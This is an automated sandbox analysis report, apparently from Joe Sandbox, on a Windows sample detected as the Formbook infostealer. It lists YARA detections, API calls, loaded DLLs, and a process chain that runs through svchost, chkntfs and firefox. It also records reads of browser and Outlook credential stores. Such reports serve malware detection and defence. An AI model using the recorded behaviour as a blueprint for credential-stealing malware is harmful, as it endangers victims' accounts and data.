            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0455D5B0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04505630
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_045716CC
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457F7B0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C70C0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0456F0CC
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457F0E0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_045770E9
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044F516C
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0458B16B
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044AF172
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044CB1B0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044DB2C0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_045612ED
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044DD2F0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C52A0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044AD34C
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457132D
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0450739A
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04539C32
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457FCF2
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C3D40
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04571D5A
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04577D73
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044DFDC0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C9EB0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457FF09
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04483FD2
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04483FD5
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C1F92
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457FFB1
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0452D800
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C38E0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044C9950
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044DB950
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04555910
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04577A46
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457FA49
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04533A6C
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0456DAC6
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04505AA0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04561AA3
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0455DAAC
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_0457FB76
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_04535BF0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044FDBF9
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_044DFB80
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004D1E20
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004CCD0A
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004CCD10
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004CCF30
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004CAFAE
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004CAFB0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004D54D0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004D366A
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004D36AC
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004D36B0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_004EBBD0
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_042DE760
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_042DD793
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_042DD7C8
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_042DE2A8
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_042E532C
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_042D038E
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_042DE3C3
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 3_2_042DCA83
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03BBF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B2B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B87E54 appears 107 times
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: String function: 0099F9F2 appears 31 times
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: String function: 009A0A30 appears 46 times
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 04507E54 appears 107 times
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 044AB970 appears 262 times
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 044F5130 appears 58 times
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 0453F290 appears 103 times
            Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: String function: 0452EA12 appears 86 times
            Source: p4LNUqyKZM.exe, 00000000.00000003.1693769873.0000000003CFD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs p4LNUqyKZM.exe
            Source: p4LNUqyKZM.exe, 00000000.00000003.1694636578.0000000003B53000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs p4LNUqyKZM.exe
            Source: p4LNUqyKZM.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@12/8
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009F37B5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009E10BF AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_00A0A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Code function: 0_2_009842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | File created: C:\Users\user\AppData\Local\Temp\aut5EB9.tmp
            Source: p4LNUqyKZM.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: chkntfs.exe, 00000003.00000002.3535509329.0000000000817000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.2070016942.0000000000817000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.2066892998.0000000000817000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.2066152920.0000000000817000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: p4LNUqyKZM.exe | ReversingLabs: Detection: 42%
            Source: p4LNUqyKZM.exe | Virustotal: Detection: 37%
            Source: unknown | Process created: C:\Users\user\Desktop\p4LNUqyKZM.exe "C:\Users\user\Desktop\p4LNUqyKZM.exe"
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\p4LNUqyKZM.exe"
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe | Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
            Source: C:\Windows\SysWOW64\chkntfs.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\p4LNUqyKZM.exe"
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe | Process created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
            Source: C:\Windows\SysWOW64\chkntfs.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: ulib.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: ifsutil.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: devobj.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\chkntfs.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: p4LNUqyKZM.exeStatic file information: File size 1250816 > 1048576
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: p4LNUqyKZM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000001.00000002.1885469349.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1852804747.000000000341A000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000002.3535610034.0000000000638000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SCsLZYqthBle.exe, 00000002.00000002.3535229764.00000000001BE000.00000002.00000001.01000000.00000004.sdmp, SCsLZYqthBle.exe, 00000007.00000000.1955287762.00000000001BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: p4LNUqyKZM.exe, 00000000.00000003.1693769873.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, p4LNUqyKZM.exe, 00000000.00000003.1694275848.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885612260.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885612260.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1797175135.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1795600663.0000000003700000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536314646.000000000461E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536314646.0000000004480000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1885366615.000000000412D000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1891266886.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: p4LNUqyKZM.exe, 00000000.00000003.1693769873.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, p4LNUqyKZM.exe, 00000000.00000003.1694275848.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1885612260.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885612260.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1797175135.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1795600663.0000000003700000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000003.00000002.3536314646.000000000461E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3536314646.0000000004480000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1885366615.000000000412D000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000003.00000003.1891266886.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: svchost.exe, 00000001.00000002.1885469349.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1852804747.000000000341A000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000002.3535610034.0000000000638000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: chkntfs.exe, 00000003.00000002.3536613638.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3535509329.0000000000798000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000000.1955867133.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2174561801.00000000365AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000003.00000002.3536613638.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.3535509329.0000000000798000.00000004.00000020.00020000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000000.1955867133.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2174561801.00000000365AC000.00000004.80000000.00040000.00000000.sdmp
            Source: p4LNUqyKZM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: p4LNUqyKZM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: p4LNUqyKZM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: p4LNUqyKZM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: p4LNUqyKZM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009842DE
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A0A76 push ecx; ret 0_2_009A0A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041583A push 0000006Eh; ret 1_2_004158D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004158B7 push 0000006Eh; ret 1_2_004158D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403400 push eax; ret 1_2_00403402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00405C1E push ebx; retf 1_2_00405C1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0225F pushad ; ret 1_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B027FA pushad ; ret 1_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD push ecx; mov dword ptr [esp], ecx1_2_03B309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0283D push eax; iretd 1_2_03B02858
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044827FA pushad ; ret 3_2_044827F9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0448225F pushad ; ret 3_2_044827F9
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_0448283D push eax; iretd 3_2_04482858
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_044B09AD push ecx; mov dword ptr [esp], ecx3_2_044B09B6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D2437 push 0000006Eh; ret 3_2_004D24D5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D24B4 push 0000006Eh; ret 3_2_004D24D5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004C281B push ebx; retf 3_2_004C281C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D510F pushfd ; retf 3_2_004D5128
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004DF180 push 00000052h; retn F78Dh3_2_004DF226
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004D5229 push ecx; ret 3_2_004D522E
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_004DB963 push esi; iretd 3_2_004DB964
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 3_2_042E142E push ebx; ret 3_2_042E142F
